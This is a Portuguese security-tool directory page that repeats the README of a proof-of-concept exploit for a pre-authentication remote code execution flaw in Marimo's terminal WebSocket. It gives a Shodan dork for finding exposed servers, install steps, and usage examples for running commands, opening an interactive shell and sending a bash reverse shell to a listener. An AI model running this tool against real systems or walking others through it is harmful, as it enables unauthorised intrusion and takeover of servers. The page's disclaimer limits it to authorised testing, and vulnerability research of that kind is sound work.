Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-39987-POC — CVE-2026-39987 Ferramenta de Exploração - Marimo < 0.23.0 Pre-Auth RCE (WebSocket) | Kitploit
Ferramentas/GitHubGitHub/m3ph1569/cve-2026-39987-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubm3ph1569/cve-2026-39987-poc

CVE-2026-39987-POC

CVE-2026-39987 Ferramenta de Exploração - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)

Ver Repositório
21há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-39987 - Marimo < 0.23.0 RCE Pré-Autenticação (WebSocket)

CVSS Severity Python License

Exploit de Prova de Conceito (PoC) para uma vulnerabilidade crítica de Execução Remota de Código (RCE) Pré-Autenticação em versões do Marimo anteriores a 0.23.0.

A vulnerabilidade permite que um atacante não autenticado se conecte ao endpoint WebSocket (/terminal/ws) e execute comandos arbitrários do sistema no servidor alvo.

Funcionalidades

  • Verificação Automatizada: Verifica automaticamente o alvo quanto à vulnerabilidade identificando a versão e verificando a presença da aplicação Marimo (via favicon e endpoints /api/version).
  • Execução de Comando Único: Envie um único comando para o alvo e receba a saída.
  • Shell Interativo: Inicie um shell persistente pseudo-interativo para interagir com o alvo de forma contínua.
  • Geração de Reverse Shell: Suporte integrado para gerar e executar payloads de reverse shell.
  • Bypass de Verificação: Capacidade de ignorar as verificações de versão e presença com a flag --no-check para ambientes onde os endpoints possam estar ocultos.
  • Shodan / FOFA Dork

    Você pode usar o seguinte dork para identificar instâncias potencialmente vulneráveis:

    root@kitploit:~
    http.favicon.hash:-1864630356
    

    Instalação

    É recomendado usar um ambiente virtual Python para instalar as dependências.

    root@kitploit:~
    # 1. Clone the repository
    git clone https://github.com/M3PH1569/CVE-2026-39987-POC.git
    cd CVE-2026-39987-POC
    
    # 2. Create and activate a virtual environment
    python -m venv .CVE-2026-39987
    
    # Windows
    .CVE-2026-39987\Scripts\activate
    # Linux/macOS
    source .CVE-2026-39987/bin/activate
    
    # 3. Upgrade pip and Install required dependencies
    # Windows
    py pip install --upgrade pip ; pip install -r requirements.txt
    # Linux/MacOS
    python3 pip install --upgrade pip && pip install -r requirements.txt
    

    Uso

    root@kitploit:~
    usage: CVE-2026-39987.py [-h] [-i] [--revshell IP PORT] [--ping-interval SEC] [--ping-timeout SEC] [--no-ping] [--max-retries N] [--no-reconnect] [--no-check] target [command]
    
    positional arguments:
      target               Target URL (e.g. http://localhost:8080)
      command              Command to execute (omit when using -i)
    
    options:
      -h, --help           show this help message and exit
      --no-check           Skip vulnerability version check
    
    Execution modes:
      -i, --interactive    Interactive shell mode
      --revshell IP PORT   Generate & send a bash reverse shell payload
    
    WebSocket tuning:
      --ping-interval SEC  WebSocket ping interval in seconds (default: 30, more frequent for stability)
      --ping-timeout SEC   WebSocket ping timeout in seconds (default: 300, increased from 120 for slow servers)
      --no-ping            Disable WebSocket ping/pong entirely (recommended if still disconnect)
    
    Reconnect options:
      --max-retries N      Max auto-reconnect attempts (default: 5)
      --no-reconnect       Disable auto-reconnect on unexpected disconnect
    

    Exemplos

    1. Executar um único comando:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 "id"
    

    2. Iniciar um shell interativo:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 -i
    

    3. Executar um reverse shell: Certifique-se de ter um netcat listener em execução na sua máquina (ex: nc -lvnp 4444).

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 --revshell 10.0.0.1 4444
    

    4. Ignorar verificações e forçar execução:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 "whoami" --no-check
    

    Contribuição

    Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.

    1. Fork do repositório
    2. Crie sua branch de funcionalidade (git checkout -b feature/update-feature)
    3. Commit suas alterações (git commit -m 'Add update feature')
    4. Push para a branch (git push origin feature/update-feature)
    5. Abra um Pull Request

    Aviso Legal

    Esta ferramenta é estritamente para fins educacionais e hacking ético autorizado. O autor não se responsabiliza por qualquer uso indevido, danos ou atividades ilegais causadas por este script. Sempre certifique-se de ter permissão explícita do proprietário do sistema antes de realizar qualquer teste de segurança. O uso não autorizado deste script é ilegal e punível por lei.

    Licença

    Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.


    Feito com ☕︎ por M3PH1569
    Baixar ferramenta